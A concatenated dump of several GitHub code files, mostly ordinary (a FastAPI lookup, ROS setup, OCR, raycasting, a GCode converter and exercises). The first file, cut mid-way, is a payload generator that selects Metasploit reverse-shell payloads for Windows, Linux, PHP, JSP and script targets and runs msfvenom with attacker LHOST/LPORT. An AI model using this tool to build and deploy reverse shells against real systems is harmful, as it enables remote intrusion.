\")\nos_arc = input(\" [++] x86 or x64? (1 or 2): \")\npayload = \"\"\n\n# Meterpreter Staged\nif type_1 == \"1\" and type_2 == \"1\" and os1 == \"1\" and os_arc == \"1\":\n payload = \"windows/meterpreter/reverse_tcp\"\nif type_1 == \"1\" and type_2 == \"1\" and os1 == \"1\" and os_arc == \"2\":\n payload = \"windows/x64/meterpreter/reverse_tcp\"\nif type_1 == \"1\" and type_2 == \"1\" and os1 == \"2\" and os_arc == \"1\":\n payload = \"linux/x86/meterpreter/reverse_tcp\"\nif type_1 == \"1\" and type_2 == \"1\" and os1 == \"2\" and os_arc == \"2\":\n payload = \"linux/x64/meterpreter/reverse_tcp\"\n\n# Meterpreter Stageless\nif type_1 == \"2\" and type_2 == \"1\" and os1 == \"1\" and os_arc == \"1\":\n payload = \"windows/meterpreter_reverse_tcp\"\nif type_1 == \"2\" and type_2 == \"1\" and os1 == \"1\" and os_arc == \"2\":\n payload = \"windows/x64/meterpreter_reverse_tcp\"\nif type_1 == \"2\" and type_2 == \"1\" and os1 == \"2\" and os_arc == \"1\":\n payload = \"linux/x86/meterpreter_reverse_tcp\"\nif type_1 == \"2\" and type_2 == \"1\" and os1 == \"2\" and os_arc == \"2\":\n payload = \"linux/x64/meterpreter_reverse_tcp\"\n\n\n\n# Standard Stanged\nif type_1 == \"1\" and type_2 == \"2\" and os1 == \"1\" and os_arc == \"1\":\n payload = \"windows/shell/reverse_tcp\"\nif type_1 == \"1\" and type_2 == \"2\" and os1 == \"1\" and os_arc == \"2\":\n payload = \"windows/x64/shell_reverse_tcp\"\nif type_1 == \"1\" and type_2 == \"2\" and os1 == \"2\" and os_arc == \"1\":\n payload = \"linux/x86/shell/reverse_tcp\"\nif type_1 == \"1\" and type_2 == \"2\" and os1 == \"2\" and os_arc == \"2\":\n payload = \"linux/x64/shell/reverse_tcp\"\n\n# Standard Stangeless\nif type_1 == \"2\" and type_2 == \"2\" and os1 == \"1\" and os_arc == \"1\":\n payload = \"windows/shell_reverse_tcp\"\nif type_1 == \"2\" and type_2 == \"2\" and os1 == \"1\" and os_arc == \"2\":\n payload = \"windows/x64/shell_reverse_tcp\"\nif type_1 == \"2\" and type_2 == \"2\" and os1 == \"2\" and os_arc == \"1\":\n payload = \"linux/x86/shell_reverse_tcp\"\nif type_1 == \"2\" and type_2 == \"2\" and os1 == \"2\" and os_arc == \"2\":\n payload = \"linux/x64/shell_reverse_tcp\"\n\n\n# Used for Error Handling\nif payload == \"\":\n print(\"Something went wrong... Please check inputs. Exiting...\")\n sys.exit()\n\nprint(\"\")\nprint(\"[+] Supported file types...\")\nprint(\"1 = .exe 5 = .aspx 9 = .py\")\nprint(\"2 = .elf 6 = .jsp 10 = .sh\")\nprint(\"3 = .php 7 = .war\")\nprint(\"4 = .asp 8 = .pl\")\nset_file_type = input(\" [++] Choose a supported file type: \")\n\nif set_file_type == \"1\":\n file_type = \"exe\"\nelif set_file_type == \"2\":\n file_type = \"elf\"\nelif set_file_type == \"3\":\n file_type = \"php\"\n payload = \"php/reverse_php\"\nelif set_file_type == \"4\":\n file_type = \"asp\"\nelif set_file_type == \"5\":\n file_type = \"aspx\"\nelif set_file_type == \"6\":\n file_type = \"jsp\"\n payload = \"java/jsp_shell_reverse_tcp\"\nelif set_file_type == \"7\":\n file_type = \"war\"\n payload = \"java/jsp_shell_reverse_tcp\"\nelif set_file_type == \"8\":\n file_type = \"pl\"\n payload = \"cmd/unix/reverse_perl\"\nelif set_file_type == \"9\":\n file_type = \"py\"\n payload = \"cmd/unix/reverse_python\"\nelif set_file_type == \"10\":\n file_type = \"sh\"\n payload = \"cmd/unix/reverse_bash\"\nelse:\n print(\"Something went wrong... Please check inputs. Exiting...\")\n sys.exit()\nprint(\"\")\n\ndel_file = \"shell.{file}\".format(file=file_type)\nif os.path.isfile(del_file):\n os.system(\"rm -r {file}\".format(file=del_file))\n\n\nprint(\"Payload ready\")\nmsf_command = \"msfvenom -p {payload} LHOST={ip} LPORT={port} -f {file} > shell.{file}\".format(payload=payload,ip=ip,port=port,file=file_type)\nprint(msf_command)\nprint(\"\")\n\n\nos.system(msf_command)\n","repo_name":"Cyb3rR3ap3r/payload_generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"75120639607","text":"from fastapi import status, Response\nimport mysql.connector\n\n\ndef mySQL_Connection():\n mySQL = mysql.connector.connect(\n host=\"localhost\", user=\"root\", password=\"\", database=\"manageapi\")\n myCursor = mySQL.cursor(dictionary=True)\n return mySQL, myCursor\n\n\ndef get_projectid(id: int, response: Response):\n mySQL, myCursor = mySQL_Connection()\n\n myproducts = 'SELECT * FROM `projects` WHERE `project_id` = %s'\n val = (id, )\n myCursor.execute(myproducts, val)\n mystringprojects = myCursor.fetchone()\n\n if mystringprojects is None:\n response.status_code = status.HTTP_404_NOT_FOUND\n return {\"message\": \"ไม่มีสินค้าชิ้นนี้ในฐานข้อมูล\"}\n else:\n result = {}\n result['project_id'] = mystringprojects['project_id']\n result['project_name'] = mystringprojects['project_name']\n result['project_url'] = mystringprojects['project_url']\n result['project_key'] = mystringprojects['project_key']\n result['project_section'] = mystringprojects['project_section']\n \n mySQL.close()\n myCursor.close()\n response.status_code = status.HTTP_200_OK\n return result\n\n # if mystringcomponents:\n # component = []\n # for data in mystringcomponents:\n # components = {}\n # components['name'] = data['component_name']\n # components['value'] = data['component_type']\n # component.append(components)\n # result['product_component'] = component\n # else:\n # result['product_component'] = None\n\n # mySQL.close()\n # myCursor.close()\n # response.status_code = status.HTTP_200_OK\n # return result\n","repo_name":"iyou25/vicore","sub_path":"backend/projectid.py","file_name":"projectid.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23182298235","text":"class ProjectManager:\n def __init__(self):\n self.projectName = ''\n self.keyFrames = []\n\n def setProject(self, name, osPath):\n self.projectName = name+'.stm'\n if not osPath.isfile(self.projectName):\n open(self.projectName, 'w').close()\n\n def storeKeyFrames(self, frames):\n keys = ''\n for frame in frames:\n for name, part in frame.BODY_PARTS.items():\n keys += \"{},{},{},{},{}\\n\".format(name, part.bone.x, part.bone.y, part.x, part.y)\n\n file = open(self.projectName, \"w\")\n file.write(keys)\n file.close()\n\n def getKeyFrames(self):\n file = open(self.projectName, \"r\")\n keys = file.read().strip().split('\\n')\n dic = {}\n for i, key in enumerate(keys):\n key = key.split(',')\n dic[key[0]] = list(map(int, key[1:len(key)]))\n if (i+1)%10 == 0:\n self.keyFrames.append(dic)\n dic = {}\n\n file.close()\n\n return self.keyFrames\n","repo_name":"Karthick-sketch/Pygame-Projects","sub_path":"Stickman-Animator/projectManager.py","file_name":"projectManager.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27740637731","text":"#!/usr/bin/env python3\nimport subprocess\n\nprocesses = ['./par_nlg.out', './par_sq.out', './seq_sq.out', './seq_nlg.out']\nsizes = ['120', '180', '240']\ncores = ['1', '2', '3', '4']\n\ndef run_process(run):\n rv = subprocess.check_output(run).decode('utf-8')\n rv = rv.strip()\n rv = rv.split('\\n')\n for i, line in enumerate(rv):\n rv[i] = line.split(' ')\n if 'workers' in rv[0]:\n cpu_count = int(rv[0][8])\n else:\n cpu_count = 1\n bodies = int(rv[0][1])\n time = float(rv[1][1])\n return (p, bodies, time, cpu_count)\n\n\nfor p in processes:\n runs = []\n for size in sizes:\n if 'par' in p:\n for c in cores:\n runs.append([p, size, '50000', c])\n else:\n runs.append([p, size, '50000'])\n if 'nlg' in p:\n for run in runs:\n run.append('0.7')\n\n \n for run in runs:\n results = []\n for i in range(5):\n results.append(run_process(run))\n for i in range(2):\n results.remove(min(results, key=lambda rvec: rvec[2]))\n results.remove(max(results, key=lambda rvec: rvec[2]))\n print(results[0])\n","repo_name":"sakjur/parallell","sub_path":"project/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38835039813","text":"import os\nfrom glob import glob\nfrom setuptools import setup\n\npackage_name = 'yolov3_ros'\nshare_dir = 'share/' + package_name\n\nsetup(\n name=package_name,\n version='0.2.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages', ['resource/' + package_name]),\n (share_dir, ['package.xml'])\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='jinseog',\n maintainer_email='jstar0525@gmail.com',\n description='YOLOv3 pytorch ros',\n license='BSD',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'detector = yolov3_ros.detector:main'\n ],\n },\n)\n","repo_name":"jstar0525/ros2_yolov3","sub_path":"yolov3_ros/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12108496282","text":"import numpy as np\nimport pandas as pd\nimport sqlite3\n\n# pais_nome = np.array(['Great Britain', 'China', 'Russia', 'United States', 'Korea', 'Japan', 'Germany'])\n# vetor = pd.Series(pais_nome)\n#\n# print(vetor)\n\n# dici = pd.Series([29, 38, 24, 46, 13, 7, 11], index=['Great Britain', 'China', 'Russia', 'United States', 'Korea', 'Japan', 'Germany'])\n# print(dici.loc['China'])\n#\n# print(dici.iloc[0])\n#\n#\n#\n# primeiro = pd.Series([1,2,3,4], index=['a', 'b', 'c', 'd'])\n# segundo = pd.Series([10,20,30,40], index=['a', 'b', 'c', 'd'])\n# total = primeiro + segundo\n#\n# print(total)\n#\n# lista = {'cidade': ['toronto', 'bh'], 'ano':[2000, 2010]}\n# ve = pd.DataFrame(lista)\n#\n# print(ve.describe())\n\n#\n# participantes = pd.Series([200, 201, 202], index=['a', 'b', 'c'])\n# doideri = pd.Series(['eu', 'vc', 'tu'], index=['a', 'b', 'c'])\n# ser = pd.DataFrame({'olha que legal': participantes, 'vamo ve':doideri})\n# print(ser)\n\n\n# vetor = np.array([2010, 2012, 2015])\n# dic = {'ano': vetor}\n# df = pd.DataFrame(dic)\n# print(df.head(1))\n#\n# print(df.tail(1))\n#\n# print(df.index)\n\n# def standardize(test):\n# return (test - test.mean()/ test.std())\n#\n# def standardize_scores(dataf):\n# return (dataf.apply(standardize))\n#\n# teste = pd.DataFrame({'teste1': [95, 84, 73, 88, 82, 61], 'teste2': [74, 85, 82, 73, 77, 79]}, index=['jack', 'lewis', 'patrick', 'rich', 'kelly', 'paula'])\n# # print(teste.sort_values('teste1'))\n#\n# # print(standardize(teste['teste1']))\n# print(standardize_scores(teste))\n\ncreate_table = \"\"\"CREATE TABLE student_score\n(Id INTEGER, Name VARCHAR(20), Math REAL, Science REAL);\"\"\"\n\ninsertSQL = [(10, 'Jack', 85,92),(29,'Tom', 73, 89), (65, 'Ram', 65.5, 77),\n (5, 'Steve',55, 91)]\ninsert_stat = \"Insert into student_score values (?,?,?,?)\"\n\n\nexecuteSQL = sqlite3.connect(':memory:')\nexecuteSQL.execute(create_table)\nexecuteSQL.executemany(insert_stat, insertSQL)\nexecuteSQL.commit()\n\nSQL_query = executeSQL.execute('select * from student_score')\nresultset = SQL_query.fetchall()\nprint(resultset)\ndf_stutend = pd.DataFrame(resultset, columns=list(zip(*SQL_query.description))[0])\nprint(df_stutend)","repo_name":"filipeth/Machine-Learning","sub_path":"exemplo-pandas.py","file_name":"exemplo-pandas.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27451648410","text":"def plot(n, t, loglog, interpolation):\n from matplotlib import pyplot as plt\n\n interpolated = list(map(interpolation, n))\n # ci = 1/1.2e-6\n ci = interpolated[0]/0.6\n interpolated = list(map(lambda x: x/ci, interpolated))\n\n ca = t[0]\n t = list(map(lambda x: x/ca, t))\n # plotting the points\n plt.plot(n, t, color='k', label='actual')\n plt.plot(n, interpolated, color='r', label='interpolated')\n plt.legend()\n\n if loglog:\n plt.loglog(n, t)\n plt.loglog(n, interpolated)\n # naming the x axis\n plt.xlabel('input size (n)')\n # naming the y axis\n plt.ylabel('run time')\n\n # giving a title to my graph\n plt.title('time complexity')\n\n # function to show the plot\n plt.show()\n","repo_name":"kris-randen/udacity-algorithms","sub_path":"venv/P0/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9024502738","text":"# pattern printing\r\n# inp = int n\r\n# boolean = true / false\r\n#\r\n# True n=4\r\n# *\r\n# **\r\n# ***\r\n# ****\r\n# False n =4\r\n# ****\r\n# ***\r\n# **\r\n# *\r\n\r\n# i = 1\r\ntry:\r\n n = int(input('enter no of rows: '))\r\n # var = int(input('enter true(1) / false(0): '))\r\n # var = bool(var) #int ko bool me convert kerna he, string ko nai\r\n\r\n var = bool(int(input('enter true(1) / false(0): ')))\r\n\r\n if var == True:\r\n# # for i in range(1, n + 1):\r\n# # print('*' * i)\r\n#\r\n# alternate way to do it\r\n for i in range(1, n + 1):\r\n for j in range(1, i+1):\r\n print('*',end=' ')\r\n print()\r\n\r\n\r\n\r\n\r\n if var == False:\r\n # for i in range(1, n + 1):\r\n # print('*' * (n + 1 - i))\r\n\r\n for i in range(n,0,-1):\r\n print(i)\r\n for j in range(1, i+1):\r\n print('*',end=' ')\r\n print()\r\n\r\nexcept Exception as e:\r\n print('invalid input!!')\r\n","repo_name":"Juilee27/Python","sub_path":"PyCharm/exercise4.py","file_name":"exercise4.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42118800707","text":"f = open(\"../../Language_Models/characters.dic\", \"r\")\ng = open(\"./phonetic.csv\", \"r\")\nw = open(\"./new.dic\", \"w+\")\nar = f.read().split(\"\\n\")\narr = g.read().split(\"\\n\")\nfor line in arr:\n hyp = line.split(\",\")\n i = 0\n try:\n while ar[i].startswith(hyp[0]):\n w.write(ar[i] + \"\\n\")\n i = i + 1\n except Exception as e:\n print(e)\n for h in hyp[:len(hyp) - 1]:\n if len(h) > 1:\n w.write(hyp[0] + \"(\" + str(i + 2) + \")\" + \"\t\" + h + \"\\n\")\n i = i + 1\nf.close()\ng.close()\nw.close()\n","repo_name":"AnirbanBanik1998/Modern_Speak_and_Spell","sub_path":"Speech_Processing/accuracy_check/new_dict.py","file_name":"new_dict.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"13901163506","text":"import os\nimport easyocr\nimport time\n\n# Get the current directory\n# C:\\Users\\USER\\Downloads\\ocr\n# current_directory = \"C:\\\\Users\\\\USER\\\\Downloads\\\\ocr\"\ncurrent_directory = \"C:\\\\Users\\\\USER\\\\Desktop\\\\ocr\"\n\n# Initialize the OCR reader\nreader = easyocr.Reader(['en'])\n\n# Open a file for writing the results\noutput_file = open(f'output_{str(int(time.time()))}.txt', 'w')\nfor filename in os.listdir(current_directory):\n # Check if the file is an image (you can add more image file extensions if needed)\n if filename.endswith(('.jpg', '.jpeg', '.png', '.gif')):\n # Read the text from the image\n image_path = os.path.join(current_directory, filename)\n result = reader.readtext(image_path, detail=0)\n\n # Write the result to the output file\n output_file.write(f\"File: {filename}\\n\")\n output_file.write(f\"Text: {result}\\n\")\n output_file.write(\"\\n\")\n\n # Log the progress to the terminal\n print(f\"Processed: {filename}\")\n\n\n# Close the output file\noutput_file.close()\n","repo_name":"Bayurzx/imageToText","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35915389023","text":"import pygame\r\nimport math\r\n\r\nclass Ray:\r\n def __init__(self, x, y, angle):\r\n self.position = pygame.Vector2(x, y)\r\n self.direction = pygame.Vector2(math.cos(angle), math.sin(angle))\r\n self.angle = angle\r\n self.last_cast = pygame.Vector2()\r\n \r\n def update_pos(self, new_x, new_y):\r\n self.position.x = new_x\r\n self.position.y = new_y\r\n\r\n def set_angle(self, angle):\r\n self.direction = pygame.Vector2(math.cos(angle), math.sin(angle))\r\n self.angle = angle\r\n\r\n def draw(self, screen):\r\n pygame.draw.line(screen, (170, 170, 170), self.position, \r\n self.last_cast)\r\n\r\n def cast(self, wall):\r\n # Line intersection formula\r\n x1 = wall.point_one.x\r\n y1 = wall.point_one.y\r\n x2 = wall.point_two.x\r\n y2 = wall.point_two.y\r\n\r\n x3 = self.position.x\r\n y3 = self.position.y\r\n x4 = self.position.x + self.direction.x\r\n y4 = self.position.y + self.direction.y\r\n\r\n den = (x1 - x2) * (y3 - y4) - (y1 - y2) * (x3 - x4)\r\n if den == 0:\r\n return False\r\n\r\n t = ((x1 - x3) * (y3 - y4) - (y1 - y3) * (x3 - x4)) / den\r\n u = -((x1 - x2) * (y1 - y3) - (y1 - y2) * (x1 - x3)) / den\r\n\r\n # If intersection\r\n if t > 0 and t < 1 and u > 0:\r\n # Calculate point of intersection and return\r\n intersect = pygame.Vector2()\r\n intersect.x = x1 + t * (x2 - x1)\r\n intersect.y = y1 + t * (y2 - y1)\r\n return intersect\r\n\t\t\r\n return False\r\n","repo_name":"Jamz25/raycast-engine-py","sub_path":"src/ray.py","file_name":"ray.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12985527807","text":"'''\r\nFetch an image, vector-fill it via the first-left diagonal algorithm and convert it to a set of\r\nGCode instructions for a 3D Printer controller. The ultimate goal is to let the printer head \"draw\"\r\nthe desired image, either via pencil, or via a drill thus converting it to a CNC mill.\r\n\r\nRemarks:\r\n* Marlin GCode dialect\r\n* The origin at the start will be the absolute movement origin, right-top-up orientation\r\n* Assume the drill bit starts at the bottom left and Z=drilling the surface at desired depth\r\n* Perform the test swipe around the drilled area and wait for confirmation before drilling\r\n* Requires separately configurable X-Y and Z speeds due to mechanical reasons (direct vs wormgear)\r\n\r\noton.ribic@bug.hr\r\n'''\r\n\r\nimport vectorizer\r\nfrom PIL import Image as pil\r\n\r\n# Some statics\r\n\r\n# GCode initializations\r\nGCodeHeader = ['M82;Absolute mode',\r\n 'G92 X0 Y0 Z0 E0;Reset coordinate system',\r\n 'M107;Fans off',\r\n 'M17;Enable motors',\r\n ]\r\nGCodeFooter = ['M84 X Y E;Release motors',\r\n ]\r\n\r\n# Main bitmap -> vector GCode processing\r\n\r\n\r\ndef img2cnc(\r\n inputfile, # Image file w/ path or PIL handle directly\r\n outputfile=None, # Autogenerated if not supplied\r\n invertpixels=True, # Whether to consider black pixels \"true\" instead of white\r\n scale=0.1, # How many GCode millimeters per pixel in the image (0.1 = 10 pixels per mm)\r\n moveextents=True, # Move head over extents and require confirmation before start\r\n hopheight=2, # Height of the head above the drilling depth while traversing (mm)\r\n tspeedxy=100, # Traversal speed in X-Y (mm/s)\r\n dspeedxy=1.5, # Drill speed in X-Y (mm/s)\r\n tspeedz=5, # Traversal (retraction) speed in Z (mm/s)\r\n dspeedz=0.6, # Sink speed in Z (mm/s)\r\n negativey=True, # Whether to invert Y axis (required on Marlin e.g.)\r\n diag=False, # Diagnostics mode to export tracks to SVG (requires SVGGEN)\r\n):\r\n '''Main one converting image to a GCode file'''\r\n\r\n # Get vector \"list of lists\"\r\n vectors = vectorizer.vectorize(\r\n inputfile,\r\n method='f',\r\n invertpixels=invertpixels,\r\n splittogrid=(500, 500),\r\n calibrator=None,\r\n reverseall=True,\r\n negativey=negativey,\r\n )\r\n # Export SVG if in diagnostics mode\r\n if diag:\r\n try:\r\n import svggen\r\n svggen.svggen(vectors, inputfile + '.svg')\r\n except BaseException:\r\n print('No SVGGEN library available')\r\n # Calculate scaling and extents\r\n allx, ally = set(), set() # Collectors\r\n for sid, shape in enumerate(vectors):\r\n for pid, point in enumerate(shape):\r\n # Point-per-point\r\n nx, ny = round(point[0] * scale, 3), round(point[1] * scale, 3)\r\n vectors[sid][pid] = (nx, ny)\r\n # Collectors for extent calculations\r\n allx.add(nx)\r\n ally.add(ny)\r\n extents = min(allx), min(ally), max(allx), max(ally)\r\n\r\n # Normalize speeds to GCode/GRBL unit: mm/min (from mm/s)\r\n tspeedxy = round(tspeedxy * 60)\r\n dspeedxy = round(dspeedxy * 60)\r\n tspeedz = round(tspeedz * 60)\r\n dspeedz = round(dspeedz * 60)\r\n\r\n # Show to the user\r\n print('Extents (x1,y1,x2,y2) mm:', extents)\r\n print('Size (x,y) mm:', extents[2] - extents[0], extents[3] - extents[1])\r\n\r\n gcode = [] # Collector of instructions to be assembled later\r\n # Perform initial hop to height's initial position\r\n gcode.append('G0 F{0} Z{1}'.format(tspeedz, hopheight))\r\n # Show extents if required\r\n if moveextents:\r\n gcode.append('G0 X{0} Y{1} F{2};Top left'.format(extents[0], extents[3], tspeedxy))\r\n gcode.append('M0 Confirm Top Left;Wait for confirmation')\r\n gcode.append('G0 X{0} Y{1} F{2};Bottom right'.format(extents[2], extents[1], tspeedxy))\r\n gcode.append('M0 Confirm Bot Right;Wait for confirmation')\r\n # Head is now in position.\r\n # Process vectors step-by-step, considering head hops and relative speeds. Note that\r\n # the GCode controller, by the point of the first instructions, has already been\r\n # switched to absolute motor positioning mode, which corresponds to the coordinate system\r\n # of the vectors.\r\n gcode.append('M117 Drilling...')\r\n for shape in vectors:\r\n # Assume head is up, move above the entry point\r\n gcode.append('G0 X{0} Y{1} F{2}'.format(shape[0][0], shape[0][1], tspeedxy))\r\n gcode.append('G0 Z0 F{0}'.format(dspeedz))\r\n for point in shape[1:]:\r\n # Step to point\r\n gcode.append('G0 X{0} Y{1} F{2}'.format(point[0], point[1], dspeedxy))\r\n # Retract drill to hop height at the end of shape\r\n gcode.append('G0 F{0} Z{1}'.format(tspeedz, hopheight))\r\n # After all shapes, return to the origin point\r\n gcode.append('G0 X0 Y0 F{0}'.format(tspeedxy))\r\n gcode.append('G0 Z0 F{0}'.format(dspeedz))\r\n\r\n # Completed the code itself. Append headers and footers\r\n gcode = GCodeHeader + gcode + GCodeFooter\r\n\r\n # Assemble into a file\r\n if not outputfile:\r\n outputfile = inputfile + '.gcode'\r\n outf = open(outputfile, 'w', encoding='ANSI')\r\n outf.write('\\n'.join(gcode))\r\n outf.close()\r\n print('All done, instructions written:', len(gcode))\r\n\r\n\r\n### Ran as main?\r\n################\r\nif __name__ == '__main__':\r\n img2cnc('inputs\\\\pcbsample.png')\r\n # img2cnc('inputs\\\\24x24.png')\r\n # img2cnc('inputs\\\\sampleprint.png')\r\n img2cnc('inputs\\\\funkcionira.png')","repo_name":"otonribic/3dp2cnc","sub_path":"3dp2cnc.py","file_name":"3dp2cnc.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"23610223500","text":"import heapq\n\ndata = []\nwith open('input.txt', 'r') as f:\n line = f.readline().strip()\n rowlen = len(line)\n ninerow = [9 for _ in range(rowlen+2)]\n data.append(ninerow) \n while line:\n row = [9]\n for c in line.strip():\n row.append(int(c))\n row.append(9)\n data.append(row)\n line = f.readline().strip()\n data.append(ninerow)\n\nlowpoints = []\nfor y in range(1, len(data)-1):\n for x in range(1, len(data[0])-1):\n if (data[y][x] < data[y-1][x] and \n data[y][x] < data[y+1][x] and\n data[y][x] < data[y][x-1] and \n data[y][x] < data[y][x+1]):\n lowpoints.append((y, x))\n\ndef neighbours(x, y):\n return [(x-1, y), (x+1, y), (x, y-1), (x, y+1)]\n\nheap = [0, 0, 0]\n\nvisited = [[False for _ in range(len(data))] for _ in range(len(data[1]))]\nfor (y, x) in lowpoints:\n basin_size = 0\n to_visit = [(y, x)]\n visited[y][x] = True\n while to_visit:\n k,j = to_visit.pop()\n basin_size += 1\n for (b, a) in neighbours(k, j):\n if visited[b][a] or data[b][a] == 9:\n continue\n to_visit.append((b, a))\n visited[b][a] = True\n heapq.heappushpop(heap, basin_size) \nprint(heap[0] * heap[1] * heap[2])\n","repo_name":"chriskamphuis/aoc2021","sub_path":"09/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73298937527","text":"import h5py\nimport numpy as np\nimport re\nimport glob\nimport vtk\ndef natural_sort(l): \n convert = lambda text: int(text) if text.isdigit() else text.lower() #isdigt()方法字符串是否全为数字,若全是数字,为True,否则为Fasle.Python lower() 方法转换字符串中所有大写字符为小写\n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] \n return sorted(l, key = alphanum_key)\npoint_path = natural_sort(glob.glob('*/sub_tract.npy'))\n\nregion = np.load('swm_100_ad_atlas_8cluster.npy')\n\nfor i in range(len(point_path)):\n point = np.load(point_path[i])\n id = point_path[i].split('/')[-2]\n ind_region = np.load('{}_105regions.npy'.format(id))[:,0,:]\n print(ind_region.shape) #(10000,105)\n path2 = 'downsam_point_label_region_sort_{}.h5'.format(id)\n h5f = h5py.File(path2, 'w')\n h5f.create_dataset('point', data=point)\n h5f.create_dataset('region',data=region)\n h5f.create_dataset('ind_region',data=ind_region)\n\nh5_path = natural_sort(glob.glob('downsam_point_label_region_sort_*.h5'))\npoints_20 = None\nlabels_20 = None\nregions_20 = None\nind_regions_20 = None\nj_range = list(range(0,125,25))\nfor j in range(len(j_range)):\n for i in range(25):\n h5_ = h5py.File(h5_path[i],'r')\n points = np.array(h5_['point'])\n regions = np.array(h5_['region'])\n ind_regions = np.array(h5_['ind_region'])\n if i == 0:\n points_20 = points\n regions_20 = regions\n ind_regions_20 = ind_regions\n else:\n points_20 = np.concatenate((points_20,points),axis=0)\n regions_20 = np.concatenate((regions_20,regions),axis=0)\n ind_regions_20 = np.concatenate((ind_regions_20,ind_regions),axis=0)\n path2 = 'sf_clusters_train_featMatrix_{}.h5'.format(j+1)\n h5f = h5py.File(path2, 'w')\n h5f.create_dataset('point', data=points_20)\n h5f.create_dataset('region',data=regions_20)\n h5f.create_dataset('ind_region',data=ind_regions_20)\n\n \n","repo_name":"gaunny/Anat-SFSeg","sub_path":"data/AD_MCI_S01/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29263898762","text":"import json\nimport re\nfrom django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom sign.forms import *\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import CreateView\nfrom django.urls import reverse_lazy\nfrom sign.models import Order, RecordTetris, Users\nfrom django.core.mail import send_mail\n\n\n# Create your views here.\ndef index (request):\n if(request.user.is_authenticated):\n link = 'profile'\n else:\n link = 'login'\n return render(request, 'sign/index.html', {'title': 'Главная страница', 'link': link})\n\n@login_required\ndef logout_view(request):\n \"\"\" Страница выхода \"\"\"\n logout(request)\n\n return redirect('index')\n \nclass register_view(CreateView):\n \"\"\" Страница регистраций \"\"\"\n form_class = UserRegistrationForm\n template_name = 'sign/register.html'\n success_url = reverse_lazy('login')\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title']='Регистрация'\n return dict(list(context.items()))\n\n@login_required\ndef profile_view(request):\n \"\"\" Страница профиля \"\"\"\n try:\n user = Users.objects.get(user_id=request.user.id)\n return render(request, 'sign/profile.html', {'title': 'Профиль', 'name': user.name, 'surname': user.surname, 'phone': user.phone, 'isAddContact': True})\n except:\n return render(request, 'sign/profile.html', {'title': 'Профиль', 'isAddContact': False})\n \n\n@login_required\ndef save_data(request):\n data = json.loads(request.body)\n usr_phone = ''\n usr_phone = (int)((usr_phone.join(re.findall(r'\\d*', data['2'])))[1:])\n try:\n Users.objects.get(user_id=request.user.id)\n except:\n Users.objects.create(name=data['0'], surname=data['1'], phone=usr_phone, user_id=request.user.id)\n else:\n Users.objects.filter(user_id=request.user.id).update(name=data['0'], surname=data['1'], phone=usr_phone)\n return JsonResponse({})\n\n@login_required\ndef save_order(request):\n data = json.loads(request.body)\n user = Users.objects.get(user_id=request.user.id)\n Order.objects.create(user_id_id=user.id, theme=data['0'], content=data['1'])\n send_mail(\n 'Заказ: '+data['0'],\n 'Содержание: ' + data['1'] + '\\nПользователь: {} {}\\nТелефон: +7{}'.format(user.name, user.surname, user.phone),\n 'aigames@list.ru',\n ['aigames@list.ru'],\n fail_silently=False,\n )\n return JsonResponse({})\n\n@login_required\ndef save_rec(request):\n data = json.loads(request.body)\n try:\n RecordTetris.objects.get(user_id=request.user.id)\n except:\n RecordTetris.objects.create(record=data, user_id=request.user.id)\n else:\n RecordTetris.objects.filter(user_id=request.user.id).update(record=data)\n return JsonResponse({})\n\n@login_required\ndef secret_view(request):\n \"\"\" Страница доступная только авторизованным пользователям \"\"\"\n\n return render(request, 'sign/profile.html', {'title': 'Профиль'})","repo_name":"MrLobotomist/project2","sub_path":"sign/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"35566404633","text":"import numpy as np\n\nimport features\nimport go\nfrom tests import test_utils\n\nEMPTY_ROW = '.' * go.N + '\\n'\nTEST_BOARD = test_utils.load_board('''\n.X.....OO\nX........\nXXXXXXXXX\nOX......O\n''' + 